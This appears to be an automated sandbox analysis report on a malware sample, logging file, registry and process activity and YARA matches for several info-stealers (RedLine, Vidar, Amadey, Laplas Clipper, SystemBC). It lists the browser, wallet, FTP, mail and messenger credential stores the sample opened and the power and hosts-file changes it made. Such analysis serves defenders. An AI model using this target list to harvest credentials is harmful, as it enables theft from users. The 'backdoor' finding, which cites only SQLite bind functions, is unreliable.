Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\1000018002\avicapn32.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\1000018002\avicapn32.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\1000019012\syncfiles.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\1000019012\syncfiles.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

Code function: 0_2_61EAF850 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_61EAF850

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe

File written: C:\Windows\System32\drivers\etc\hosts

AV process strings found (often used to terminate AV products)

Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000031.00000002.656321722.000000000F230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.546951720.000000000F0D2000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: umciavi64.exe PID: 68, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 4.2.61312899942613011832.exe.1150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.gntuud.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.762181339.00000000003D1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.327105294.0000000001151000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY

Yara detected Laplas Clipper

Source: Yara match	File source: 27.0.avicapn32.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.avicapn32.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.821990980.0000000000E00000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.407007293.0000000000E00000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: avicapn32.exe PID: 1112, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\1000018002\avicapn32.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\avicapn32[1].exe, type: DROPPED

Yara detected SystemBC

Source: Yara match	File source: 44.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2820, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.DQxttu2Qrr.exe.1090000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DQxttu2Qrr.exe PID: 2508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: umciavi64.exe PID: 68, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???t	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml

Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml

Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000031.00000002.656321722.000000000F230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.546951720.000000000F0D2000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.298618389.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: umciavi64.exe PID: 68, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000031.00000002.656321722.000000000F230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.546951720.000000000F0D2000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: umciavi64.exe PID: 68, type: MEMORYSTR

Yara detected SystemBC

Source: Yara match	File source: 44.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2820, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.DQxttu2Qrr.exe.1090000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DQxttu2Qrr.exe PID: 2508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: umciavi64.exe PID: 68, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E1307A sqlite3_transfer_bindings,	0_2_61E1307A
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D5E6 sqlite3_bind_int64,	0_2_61E2D5E6
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D595 sqlite3_bind_double,	0_2_61E2D595
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E0B431 sqlite3_clear_bindings,	0_2_61E0B431
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E037F3 sqlite3_value_frombind,	0_2_61E037F3
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D781 sqlite3_bind_zeroblob64,	0_2_61E2D781
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D714 sqlite3_bind_zeroblob,	0_2_61E2D714
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D68C sqlite3_bind_pointer,	0_2_61E2D68C
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D65B sqlite3_bind_null,	0_2_61E2D65B
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D635 sqlite3_bind_int,	0_2_61E2D635
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D9B0 sqlite3_bind_value,	0_2_61E2D9B0
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D981 sqlite3_bind_text16,	0_2_61E2D981
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D945 sqlite3_bind_text64,	0_2_61E2D945
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D916 sqlite3_bind_text,	0_2_61E2D916
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D8E7 sqlite3_bind_blob64,	0_2_61E2D8E7
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E038CA sqlite3_bind_parameter_count,	0_2_61E038CA
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E158CA sqlite3_bind_parameter_index,	0_2_61E158CA
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E038DC sqlite3_bind_parameter_name,	0_2_61E038DC
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D8B8 sqlite3_bind_blob,	0_2_61E2D8B8

Windows Analysis Report
DQxttu2Qrr.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

